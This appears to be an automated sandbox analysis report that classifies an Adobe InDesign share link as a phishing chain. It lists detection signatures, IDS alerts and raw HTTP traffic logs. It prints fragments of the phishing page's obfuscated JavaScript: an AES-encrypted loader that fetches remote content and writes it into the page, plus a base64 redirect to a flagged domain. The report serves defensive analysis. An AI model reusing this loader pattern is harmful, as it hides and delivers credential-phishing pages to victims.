Windows Analysis Report
https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1

Overview

General Information

Sample URL: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1
Analysis ID: 1501906
Infos:

Detection

HTMLPhisher
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

AV Detection

barindex
Source: https://quantumspirel.ru/#faq Avira URL Cloud: Label: malware
Source: https://quantumspirel.ru/#services Avira URL Cloud: Label: malware
Source: https://quantumspirel.ru/#modern-supercars Avira URL Cloud: Label: malware
Source: https://quantumspirel.ru/#contact Avira URL Cloud: Label: malware
Source: https://quantumspirel.ru// Avira URL Cloud: Label: malware

Phishing

barindex
Source: Yara match File source: 11.14.pages.csv, type: HTML
Source: Yara match File source: 11.10.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_646, type: DROPPED
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: https://quantumspirel.ru///2242.php
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: window.location.href = atob(
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: async function babysat(babysitting) { <!-- <span>the joy of driving is in the journey, not just the arrival.</span> --> var {a,b,c,d} = json.parse(babysitting); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function dace() {iambus.hidden = 0;gaff.hidden = 1; document.write(await babysat(await (await fetch(await babysat(atob(`eyjhijoiwtbkejdyvfjjrkdnzjdia2jhs3kyddlhxc9ddhbwewxwdefocdlubzkxrdq9iiwiyyi6imywndywzmfmyzexyju0ymyzy2eznjq3zjq5mzg0njfiiiwiyii6ija1owm1zmvlymm4ndc0owi0zgjmnzfimzgyztm1zdyxogrhmzk4n2ezm2jlmtblmwnlmmewytk1zdkzyzlhmdjimzy2odq3mzvlmme5y2m1yjhjytewnwjjnwjlntk2ntm0ogm2mmy1ymi2ztjhmdm3mzy5yze2owy3njcyotgzote2mtgxmtnhoty1ymvlmmvkztlmnzjkmzkznja3zgiymtk5mwq2nzq4mtjlztjmnwezm2u0nmy3njk5nzyzmti0ogq5nzizndmxzwjkogrkzjy2zwqwmwfkmmy5nzi0otmzmtu0yjlhnwrkzty5n2vjnzq2mwe2mtk5...
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: Number of links: 0
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: Total embedded image size: 45708
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: Base64 decoded: {"a":"Y0dz7rTRcFGgf7HkbaKy2t9a\/CtpVylptAhp9no91D4=","c":"f0460fafc11b54bf3ca3647f4938461b","b":"059c5feebc84749b4dbf71b382e35d618da3987a33be10e1ce2a0a95d93c9a02b36684735e2a9cc5b8ca105bc5be5965348c62f5bb6e2a037369c169f767298391618113a965bee2ede9f72d393607...
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: Title: User login does not match URL
Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP Parser: No favicon
Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP Parser: No favicon
Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP Parser: No favicon
Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP Parser: No favicon
Source: https://pblc.me/pub/40f029dddc28e3 HTTP Parser: No favicon
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: No favicon
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: No favicon
Source: https://www.capterra.com/p/145471/Publicate/ HTTP Parser: No favicon
Source: https://www.capterra.com/p/145471/Publicate/ HTTP Parser: No favicon
Source: https://reviews.capterra.com/search/ HTTP Parser: No favicon
Source: https://reviews.capterra.com/search/ HTTP Parser: No favicon
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: No <meta name="author".. found
Source: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49916 version: TLS 1.2

Networking

barindex
Source: Network traffic Suricata IDS: 2014025 - Severity 1 - ET EXPLOIT_KIT Probable Scalaxy exploit kit Java or PDF exploit request : 192.168.2.5:50437 -> 172.67.73.236:443
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: global traffic HTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /unav/1.2/UniversalNav.css HTTP/1.1Host: prod.adobeccstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /en_US/sdk.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://indd.adobe.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en_US/sdk.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /nr-spa-1215.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /nr-spa-1215.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=16315&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=25436&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /pub/40f029dddc28e3 HTTP/1.1Host: pblc.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1Host: img.pblc.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1Host: img.pblc.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pblc.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1Host: img.pblc.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1Host: img.pblc.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /OFF13244785676887437647647874876473768.html HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/e7cf9275f425/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /turnstile/v0/g/e7cf9275f425/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /css/normalize.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
